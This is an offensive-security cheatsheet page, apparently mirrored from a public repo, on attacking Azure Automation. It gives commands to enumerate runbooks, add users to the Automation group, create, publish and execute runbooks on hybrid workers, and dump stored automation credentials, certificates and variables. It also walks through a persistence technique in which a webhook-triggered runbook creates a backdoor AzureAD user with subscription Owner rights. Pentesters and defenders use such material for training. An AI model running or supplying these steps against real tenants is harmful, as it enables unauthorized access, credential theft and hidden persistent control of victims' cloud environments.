daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-services-runbook.md (3748B)


      1 ---
      2 title: "Azure Services - Runbook and Automation"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-services-runbook.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-services-runbook.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure Services - Runbook and Automation
     12 
     13 ## Runbook
     14 
     15 Runbook must be **SAVED** and **PUBLISHED** before running it.
     16 
     17 ### List the Runbooks
     18 
     19 ```ps1
     20 Get-AzAutomationAccount | Get-AzAutomationRunbook
     21 ```
     22 
     23 ### Create a Runbook
     24 
     25 * Check user right for automation
     26 
     27     ```powershell
     28     az extension add --upgrade -n automation
     29     az automation account list # if it doesn't return anything the user is not a part of an Automation group
     30     az ad signed-in-user list-owned-objects
     31     ```
     32 
     33 * Add the user to the "Automation" group: `Add-AzureADGroupMember -ObjectId <OBJID> -RefObjectId <REFOBJID> -Verbose`
     34 * Get the role of a user on the Automation account: `Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>`. NOTE: Contributor or higher privileges accounts can create and execute Runbooks
     35 * List hybrid workers: `Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>`
     36 * Create a Powershell Runbook: `Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose`
     37 * Publish the Runbook: `Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
     38 * Start the Runbook: `Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose`
     39 
     40 ## Automation Account
     41 
     42 ### List Automation Accounts
     43 
     44 Azure Automation provides a way to automate the repetitive tasks you perform in your Azure environment.
     45 
     46 ```ps1
     47 Get-AzAutomationAccount
     48 ```
     49 
     50 ### Get Automation Credentials
     51 
     52 ```ps1
     53 Get-AzAutomationAccount | Get-AzAutomationCredential
     54 Get-AzAutomationAccount | Get-AzAutomationConnection
     55 Get-AzAutomationAccount | Get-AzAutomationCertificate
     56 Get-AzAutomationAccount | Get-AzAutomationVariable
     57 ```
     58 
     59 ### Persistence via Automation Accounts
     60 
     61 * Create a new Automation Account
     62     * "Create Azure Run As account": Yes
     63 * Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
     64     * Sample runbook [NetSPI/MicroBurst](https://github.com/NetSPI/MicroBurst)
     65     * Publish the runbook
     66     * Add a webhook to the runbook
     67 * Add the AzureAD module to the Automation account
     68     * Update the Azure Automation Modules
     69 * Assign "User Administrator" and "Subscription Owner" rights to the automation account
     70 * Trigger the webhook with a post request to create the new user
     71 
     72     ```powershell
     73     $uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
     74     $AccountInfo  = @(@{RequestBody=@{Username="BackdoorUsername";Password="BackdoorPassword"}})
     75     $body = ConvertTo-Json -InputObject $AccountInfo
     76     $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
     77     ```
     78 
     79 ## Desired State Configuration
     80 
     81 ### List the DSC
     82 
     83 ```ps1
     84 Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
     85 ```
     86 
     87 ### Export the configuration
     88 
     89 ```ps1
     90 $DSCName = ${dscToExport}
     91 Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match $DSCName} | Export-AzAutomationDscConfiguration -OutputFolder (get-location) -Debug
     92 ```
     93 
     94 ## References
     95 
     96 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)